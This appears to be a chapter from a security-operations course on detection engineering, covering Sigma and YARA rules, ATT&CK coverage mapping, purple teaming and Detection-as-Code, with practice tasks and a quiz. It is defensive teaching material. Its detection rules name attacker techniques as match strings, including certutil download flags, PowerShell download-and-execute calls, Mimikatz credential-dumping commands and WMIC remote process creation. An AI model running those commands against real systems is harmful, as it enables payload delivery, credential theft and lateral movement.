Chapter 4: Detection Engineering¶
Learning Objectives¶
By the end of this chapter, you will be able to:
- Design detection rules mapped to MITRE ATT&CK techniques
- Write signature-based and behavior-based detection logic
- Test detections using purple teaming methodologies
- Measure detection coverage and identify gaps
- Apply the Detection-as-Code approach for version control and CI/CD
Prerequisites¶
- Chapter 3: SIEM query languages and correlation rules
- Understanding of MITRE ATT&CK framework
- Familiarity with common attack techniques (PowerShell abuse, lateral movement, etc.)
Key Concepts¶
Detection Engineering • Sigma Rules • YARA Rules • Purple Teaming • Detection-as-Code • False Positive Rate • Detection Coverage
Curiosity Hook: The Blind Spot¶
Your organization invests heavily in endpoint protection, firewalls, and SIEM—yet an attacker used Living off the Land Binaries (LOLBins) to persist for 45 days undetected.
Why? No detection existed for their specific technique: using certutil.exe to download payloads.
The Fix: A detection engineer wrote a rule in 20 minutes:
title: Certutil Download Activity
description: Detects certutil.exe downloading files from web URLs
status: experimental
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\certutil.exe'
CommandLine|contains:
- 'urlcache'
- 'http'
condition: selection
Result: 3 similar attacks detected in the next month.
Lesson: Proactive detection engineering closes gaps before they're exploited.
4.1 What is Detection Engineering?¶
Definition¶
Detection Engineering is the discipline of designing, building, testing, and maintaining detection rules that identify malicious activity across an organization's security telemetry.
The Detection Lifecycle¶
[Threat Research] → [Rule Design] → [Development] → [Testing] → [Deployment] → [Tuning] → [Retirement]
↑ |
└──────────────────────────────────────────────────────────────┘
- Threat Research: Study attack techniques (MITRE ATT&CK, threat intel, incident reports)
- Rule Design: Map technique to observable telemetry
- Development: Write rule logic (Sigma, KQL, SPL, YARA)
- Testing: Validate with purple team exercises and test data
- Deployment: Push to production SIEM/EDR
- Tuning: Adjust thresholds, add exclusions based on FP feedback
- Retirement: Deprecate rules made obsolete by infrastructure changes or tool evolution
Detection Pyramid¶
[Threat Intel] (Specific IOCs: IP, hash, domain)
/\
/ \
/ Tactical \
/ (Behavior) \
/ Analytical \
/ (Anomaly, ML) \
/──────────────────\
Levels: - Tactical (top): IOC-based (fast to deploy, easy to evade) - Behavioral (middle): Technique-based (harder to evade, more durable) - Analytical (base): Anomaly and pattern-based (most robust, highest effort)
Best Practice: Build detections at all levels. IOCs catch known threats; behavioral rules catch variants; analytics catch novel techniques.
4.2 Detection Types¶
1. Signature-based Detection¶
Definition: Match specific known indicators (file hash, domain, regex pattern).
Example: Detect Known Malware Hash
index=endpoint file_hash="5d41402abc4b2a76b9719d911017c592"
| table _time, host, file_path, process_name
Pros: - High precision (low FPs) - Fast performance - Easy to understand
Cons: - Trivial to evade (change one byte → new hash) - Requires constant updates - Misses zero-day threats
2. Behavior-based Detection¶
Definition: Identify malicious behavior patterns independent of specific IOCs.
Example: Detect PowerShell Download & Execute
title: PowerShell Download and Execute
logsource:
category: process_creation
product: windows
detection:
selection_download:
Image|endswith: '\powershell.exe'
CommandLine|contains:
- 'Invoke-WebRequest'
- 'DownloadString'
- 'DownloadFile'
selection_execute:
CommandLine|contains:
- 'Invoke-Expression'
- 'IEX'
- 'Start-Process'
condition: selection_download and selection_execute
Pros: - Detects technique, not specific malware - Harder to evade (attacker must change TTP) - Durable across campaigns
Cons: - Higher FP risk (legitimate admin scripts may match) - Requires context and tuning
3. Anomaly-based Detection¶
Definition: Use baseline behavior to identify outliers.
Example: Detect Unusual File Access Volume
index=file_access
| stats count by user, _time span=1h
| eventstats avg(count) as avg_count, stdev(count) as stdev_count by user
| eval threshold = avg_count + (3 * stdev_count)
| where count > threshold
Logic: Alert when user accesses >3 standard deviations more files than their baseline.
Pros: - Detects novel attacks without signatures - Adaptive to environment
Cons: - Requires training period to establish baseline - Can be evaded by slow, gradual behavior changes - Higher FP rate during legitimate business changes (mergers, role changes)
4.3 Writing Detection Rules¶
Sigma: Universal Detection Format¶
Sigma is a vendor-neutral rule format that translates to multiple SIEM query languages (SPL, KQL, EQL, etc.).
Example: Detect Mimikatz Execution
title: Mimikatz Credential Dumping
id: f9c6d85e-4d6e-4f5a-9e2a-3c8f0d5e2a1b
status: stable
description: Detects execution of Mimikatz credential dumping tool
references:
- https://attack.mitre.org/software/S0002/
tags:
- attack.credential_access
- attack.t1003.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
Image|endswith:
- '\mimikatz.exe'
- '\mimilib.dll'
selection_cli:
CommandLine|contains:
- 'sekurlsa::logonpasswords'
- 'lsadump::sam'
- 'kerberos::golden'
condition: selection_img or selection_cli
falsepositives:
- Legitimate penetration testing (whitelist known test systems)
level: critical
Key Fields: - title: Human-readable name - id: Unique identifier (UUID) - tags: MITRE ATT&CK mapping - logsource: Where to find this data - detection: Logic (selections and conditions) - falsepositives: Known benign cases - level: Severity (low, medium, high, critical)
YARA: File and Memory Scanning¶
YARA rules detect patterns in files or memory (used by EDR, sandboxes, threat hunting tools).
Example: Detect Ransomware String Patterns
rule Ransomware_Generic_Strings {
meta:
description = "Generic ransomware string patterns"
author = "SOC Detection Team"
date = "2026-02-15"
strings:
$s1 = "Your files have been encrypted" ascii wide
$s2 = "bitcoin wallet" nocase
$s3 = ".onion" ascii
$s4 = "decrypt" fullword nocase
$s5 = "ransom" fullword nocase
condition:
3 of ($s*)
}
Logic: Flag files containing 3+ ransomware-related strings.
4.4 Detection Coverage Mapping¶
MITRE ATT&CK Mapping¶
Goal: Ensure detection coverage across the attack lifecycle.
Example Coverage Matrix:
| Tactic | Technique | Detection | Status | Last Tested |
|---|---|---|---|---|
| Initial Access | T1566.001 (Phishing: Attachment) | Email gateway + EDR | Active | 2026-01-15 |
| Execution | T1059.001 (PowerShell) | Suspicious script execution | Active | 2026-02-01 |
| Persistence | T1053.005 (Scheduled Task) | New scheduled task creation | Active | 2026-01-20 |
| Credential Access | T1003.001 (LSASS Memory) | Mimikatz detection + LSASS access | Active | 2026-02-10 |
| Lateral Movement | T1021.001 (RDP) | Unusual RDP connections | Tuning | 2026-01-25 |
| Exfiltration | T1041 (C2 Channel) | Large outbound transfers | Experimental | 2026-02-05 |
Coverage Metrics: - Technique Coverage: % of applicable ATT&CK techniques with at least one detection - Detection Depth: Average number of detections per technique - Test Coverage: % of detections tested in past 90 days
Gap Analysis¶
Process: 1. List all ATT&CK techniques relevant to your environment (focus on common and critical) 2. Map existing detections to techniques 3. Identify gaps (techniques with zero detections) 4. Prioritize gaps based on: - Prevalence in recent incidents - Threat intelligence indicating active use - Ease of detection (available telemetry) 5. Develop new detections to close high-priority gaps
Example Gap: - Technique: T1218.011 (Rundll32) - Gap: No detection for Rundll32 executing DLLs from temp directories - Telemetry Available: Yes (process creation logs with command-line) - Priority: High (seen in recent ransomware campaigns) - Action: Develop Sigma rule for unusual Rundll32 usage
4.5 Testing Detections: Purple Teaming¶
What is Purple Teaming?¶
Purple Teaming combines red team (offensive) and blue team (defensive) exercises to validate and improve detections.
Workflow: 1. Plan: Red team selects ATT&CK technique to test 2. Execute: Red team safely simulates the technique in test environment 3. Detect: Blue team monitors SIEM/EDR for alerts 4. Evaluate: Did detection fire? How long to detect? Any FPs? 5. Improve: Tune rule based on results
Testing Frameworks¶
Atomic Red Team - Open-source library of small, focused tests mapped to ATT&CK - Example: Test T1003.001 (LSASS dumping)
Expected Detection: EDR or SIEM should alert on: - Process accessing LSASS memory - Creation of LSASS dump file - Execution of known dumping tools (procdump.exe)
Caldera - Automated adversary emulation platform - Executes multi-step attack chains - Measures detection and response effectiveness
Test Documentation¶
Example Test Result:
Test ID: DET-2026-034
Technique: T1059.001 (PowerShell)
Detection: "Suspicious PowerShell Execution"
Date: 2026-02-15
Tester: Alice (Red Team)
Test Scenario:
Executed: powershell.exe -enc <base64_payload>
Action: Download test file from internal web server
Results:
✅ Detection fired: YES
⏱ Time to alert: 4 seconds
📊 Alert quality: HIGH (minimal context needed)
❌ False Positives: None observed
Tuning Actions:
- None required
- Validated detection is working as expected
4.6 Detection-as-Code¶
Principles¶
- Version Control: Store detection rules in Git (track changes, rollback, collaboration)
- Peer Review: Require code review before deployment (catch logic errors, improve quality)
- CI/CD Pipeline: Automate testing and deployment
- Documentation: Embed metadata (ATT&CK tags, references, false positives)
- Testing: Automated validation against test datasets
Example Git Workflow¶
detection-rules/
├── sigma/
│ ├── process_creation/
│ │ ├── mimikatz_detection.yml
│ │ └── powershell_download_execute.yml
│ └── network/
│ └── dns_tunneling.yml
├── yara/
│ └── ransomware_strings.yar
├── tests/
│ └── test_mimikatz_detection.py
└── README.md
CI Pipeline (GitHub Actions):
name: Detection Rule Validation
on: [push, pull_request]
jobs:
validate:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Validate Sigma Rules
run: |
pip install sigma-cli
sigmac --validation-only sigma/**/*.yml
- name: Convert to Splunk SPL
run: |
sigmac -t splunk sigma/**/*.yml -o converted/
- name: Run Unit Tests
run: pytest tests/
Benefits: - Catch syntax errors before production - Maintain audit trail of changes - Enable collaboration across SOC team
Interactive Element¶
MicroSim 4: Detection Rule Builder
Build and test detection rules for common attack techniques. See real-time feedback on precision and recall.
Common Misconceptions¶
Misconception: More Detections = Better Security
Reality: Quality over quantity. 10 high-fidelity, well-tuned detections outperform 100 noisy rules. Focus on coverage of critical techniques with low FP rates.
Misconception: Signature-based Detections Are Obsolete
Reality: Signatures remain valuable for known threats (malware hashes, C2 domains). Use them as part of a layered strategy alongside behavioral and anomaly-based detections.
Misconception: Purple Team Testing Is Only for Large Organizations
Reality: Small teams can use free tools like Atomic Red Team to validate detections. Even manual tests (run a known attack in a VM, check if alert fires) are valuable.
Practice Tasks¶
Task 1: Map Detection to ATT&CK¶
Given this detection rule, identify the MITRE ATT&CK technique(s) it addresses:
title: PsExec Lateral Movement
detection:
selection:
Image|endswith: '\PsExec.exe'
CommandLine|contains: '\\\'
condition: selection
Answer
Technique: T1021.002 (Remote Services: SMB/Windows Admin Shares)
Tactic: Lateral Movement
Explanation: PsExec is a common tool for lateral movement via SMB, executing commands on remote systems using Windows Admin Shares.
Task 2: Identify False Positive Risks¶
This rule detects unusual outbound network connections:
index=firewall action=allowed dest_port NOT IN (80, 443, 53)
| stats count by src_ip, dest_ip, dest_port
| where count < 5
Question: What are potential sources of false positives?
Answer
Potential false positives: - Legitimate applications using non-standard ports (VPNs, backup software, database connections) - Software updates connecting to vendor servers on various ports - Internal services (SSH port 22, RDP port 3389, custom apps) - Cloud services using dynamic port ranges
Mitigation: - Allowlist known applications and destinations - Focus on unusual port/destination combinations - Add asset context (flag only critical systems) - Increase threshold or add velocity checks
Task 3: Design a Detection¶
Scenario: An attacker uses wmic.exe to execute commands on a remote system for lateral movement.
Available Telemetry: Windows process creation logs with command-line arguments.
Task: Write a Sigma rule (in YAML format) to detect this technique.
Answer
title: WMIC Lateral Movement
id: a1b2c3d4-e5f6-7890-1234-567890abcdef
status: experimental
description: Detects use of WMIC for remote command execution
references:
- https://attack.mitre.org/techniques/T1047/
tags:
- attack.execution
- attack.lateral_movement
- attack.t1047
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\wmic.exe'
CommandLine|contains:
- '/node:'
- 'process call create'
condition: selection
falsepositives:
- Legitimate remote administration (whitelist admin workstations)
- Management tools using WMIC
level: high
Exam Prep & Certifications¶
Relevant Certifications
The topics in this chapter align with the following certifications:
- CompTIA Security+ — Domains: Security Operations, Security Architecture
- CompTIA CySA+ — Domains: Security Operations, Threat Management
- GIAC GCIH — Domains: Incident Handling, Detection and Correlation
- CISSP — Domains: Security Operations, Security Assessment and Testing
Self-Assessment Quiz¶
Question 1: What is the primary advantage of behavior-based detections over signature-based detections?
Options:
a) Behavior-based detections have zero false positives
b) Behavior-based detections are easier to write
c) Behavior-based detections are harder to evade and detect technique variants
d) Behavior-based detections require no tuning
Show Answer
Correct Answer: c) Behavior-based detections are harder to evade and detect technique variants
Explanation: Behavior-based rules focus on attacker techniques (how they act) rather than specific indicators (malware hash). Attackers can easily change hashes but changing techniques requires altering their entire approach.
Question 2: What does the Sigma rule format enable?
Options:
a) Automatic penetration testing
b) Vendor-neutral detection rules that convert to multiple SIEM query languages
c) Real-time threat intelligence sharing
d) Encrypted log storage
Show Answer
Correct Answer: b) Vendor-neutral detection rules that convert to multiple SIEM query languages
Explanation: Sigma rules are written once in YAML and can be converted to SPL (Splunk), KQL (Sentinel), EQL (Elastic), and other query languages using the sigmac tool.
Question 3: In purple teaming, what is the role of the red team?
Options:
a) Monitor SIEM alerts and investigate incidents
b) Safely simulate attack techniques to test detections
c) Write detection rules and tune thresholds
d) Manage the SIEM infrastructure
Show Answer
Correct Answer: b) Safely simulate attack techniques to test detections
Explanation: Red team executes controlled attacks to test if blue team detections work. Blue team monitors and validates alerts. This collaboration improves detection coverage.
Question 4: Which metric measures the percentage of ATT&CK techniques that have at least one detection?
Options:
a) Mean Time to Detect (MTTD)
b) False Positive Rate
c) Technique Coverage
d) Alert Volume
Show Answer
Correct Answer: c) Technique Coverage
Explanation: Technique coverage is the percentage of applicable ATT&CK techniques for which you have detections. Higher coverage means fewer blind spots.
Question 5: What is a key benefit of storing detection rules in version control (Git)?
Options:
a) Automatically fixes false positives
b) Tracks changes, enables rollback, and supports collaboration
c) Increases SIEM query performance
d) Eliminates the need for testing
Show Answer
Correct Answer: b) Tracks changes, enables rollback, and supports collaboration
Explanation: Version control provides audit trails, allows reverting bad changes, and enables peer review through pull requests. It's a core practice of Detection-as-Code.
Question 6: Which of the following is a false positive mitigation strategy?
Options:
a) Remove all detection rules
b) Add allowlists for known benign processes or systems
c) Set all alert severities to 'critical'
d) Disable correlation in the SIEM
Show Answer
Correct Answer: b) Add allowlists for known benign processes or systems
Explanation: Allowlisting (also called whitelisting) excludes known-good entities from triggering alerts, reducing false positives while preserving detection coverage for threats.
Summary¶
In this chapter, you learned:
- Detection engineering lifecycle: Research, design, development, testing, deployment, tuning
- Detection types: Signature-based (IOCs), behavior-based (techniques), anomaly-based (baselines)
- Sigma rules: Vendor-neutral detection format for portable, maintainable rules
- YARA rules: Pattern matching for files and memory
- Detection coverage: Map detections to MITRE ATT&CK to identify gaps
- Purple teaming: Collaborative testing to validate detection effectiveness
- Detection-as-Code: Version control, CI/CD, and automation for detection rules
Next Steps¶
- Next Chapter: Chapter 5: Triage & Investigation - Learn systematic investigation workflows
- Practice: Use Atomic Red Team to test a detection in your lab environment
- Build: Create a GitHub repo for your team's detection rules
- Explore: Review the Sigma rule repository for community-contributed detections
Chapter 4 Complete | Next: Chapter 5 →